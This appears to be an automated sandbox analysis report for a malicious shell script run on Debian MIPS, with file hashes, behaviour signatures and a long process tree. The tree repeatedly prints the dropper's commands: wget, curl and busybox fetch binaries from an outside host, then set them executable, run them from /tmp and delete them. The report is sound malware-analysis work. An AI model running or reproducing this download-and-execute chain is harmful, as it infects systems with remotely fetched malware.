Analysis
-
max time kernel
109s -
max time network
139s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh
-
Size
10KB
-
MD5
39af5a8e20eb9037c16b16bbdb233387
-
SHA1
fa93ebed804f88f9810f418aa96d520d93249855
-
SHA256
70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58
-
SHA512
82d0395702b8b6084c5c890074c5fe8cce1bb3fd3a61b94b1fb466c306072308348c69dd1745e1a944949d06cf55cf2f18862833d212ece5910d32d914d7eb4b
-
SSDEEP
192:QQqIcwDH+mKFlIZx/QVgh3Xql5cjG5Q3Xql54C0cwDH+mEFlIZx/F:QQq5VgNjG5CCY
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh/tmp/70d5028b897963b847d8a28034e58fae76efa4bbb7a5ef2d11a7d37240076b58.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:718
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:722
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- System Network Configuration Discovery
PID:759
-
-
/bin/chmodchmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:768
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- System Network Configuration Discovery
PID:769
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:786
-
-
/bin/chmodchmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:797
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:799
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:809
-
-
/bin/chmodchmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw./9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm 9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:863
-
-
/bin/chmodchmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:884
-
-
/bin/chmodchmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:891
-
-
/bin/chmodchmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm./Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Hh2PIn39ZMYZjTiiKRYadyMWpcmBPKbQmm2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR./q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm q0WGycxPsa0UsHE43Hknn43QERSmrdXBaR2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA./3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 3Rz6pdjPUNqPWvIkpn5lWEyjZH1W5YWIyA2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:940
-
-
/bin/chmodchmod 777 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N./4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm 4ef96x39BQqPRT4ZAEQ5GPyqlVdttxTs2N2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh./97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm 97GgtXjodJ5l1lUsnFm8PjAO0tNHXW8Mwh2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY./4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 4XaTzdNtKiWl0E5Vl1uIL9Qyo7c9z0CWAY2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD./OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm OR5ybEKF83iEUoO41L9SV4yoo7QCT4YqmD2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo3./nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:970
-
-
/bin/rmrm nblnDvKtSlHsImYIP4VHK2GZqsbkZLkuo32⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:975
-
-
/bin/chmodchmod 777 ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc./ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm ACn1qT12SP7dKMttc0kED59jvJ6ZRCEqFc2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO./yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm yLYr5VZTiy45a93TsN9n4sYEtf9lnhI9jO2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:989
-
-
/bin/chmodchmod 777 AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p05./AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm AK4PEi3wP6sqSuCKd7n9q3hL4Q6vxa5p052⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:996
-
-
/bin/chmodchmod 777 ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I./ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm ZnEEdxiquteKpbq1B0rhF3oawwjMDrzM8I2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u./LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm LXpuOHbyJlBwnyRBM42LKqDtBcKxI0g55u2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9xfGHrkUMFqlRp9hXU7UN9Ue1Vz81PkVMw2⤵
- System Network Configuration Discovery
PID:1007
-
-
